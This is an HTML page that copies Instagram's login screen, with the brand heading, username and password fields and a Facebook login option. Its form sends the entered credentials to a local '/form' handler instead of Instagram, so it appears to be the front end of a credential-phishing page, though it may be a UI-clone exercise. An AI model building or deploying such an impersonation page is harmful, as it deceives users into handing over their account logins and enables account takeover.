<!DOCTYPE html>
<html>
    <head>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        
      <title></title>
        <style>
           
            .contain{

            }
            form input{
                height:30px;
                width:300px;
                border-radius:5px;
                background:rgb(245, 244, 244); 
                border-color:rgb(228, 227, 227);
            }
            .login{
                background:rgb(169, 169, 245);
                width:300px;
                height:30px;
                color:white;
                border-radius:5px;
                font-family:arial Bold;
                border-width:0px;
            }
            .container{
                text-align:center;
                
            }
            body{
                background:rgb(250, 250, 250);
            }
            .contain{
                background:white;
                height:400px;
                width:400px;
                margin:0px auto;
                border-color:rgb(221, 221, 221);
                border-style:solid;
            }
            @media screen and (max-width:800px){
                .container{
                    height:auto;
                    width:100%;
                }

            }
            
            .signup{
                background:white;
                height:50px;
                width:400px;
                margin:10px auto;
                border-color:rgb(221, 221, 221);
                border-style:solid;
            }
        </style>
    </head>

    <body>
        <div class="container"> 
            <div class="contain">
             <h1>instagram</h1>
            <form action="/form" method="post">
                <p></label><input type="text" idd="username" name="username" placeholder="Phone number, username, or email"/></p>
               <input type="password" id="password" name="password" placeholder="Password"/></p>
                 <button class="login">Log in</button>
                 <p>____________ OR ____________</p>
                 <P><img src="facebook.jpg" height="40px" width="40px" alt="FB">Log in with Facebook</P>
                 <p><a>Forget password?</a></p>
              
            </form>
        </div>
        <div class="signup">
            <p>Don't have an account? <a>Sign up</a></p>
        </div>
    </div>
    </body>
</html>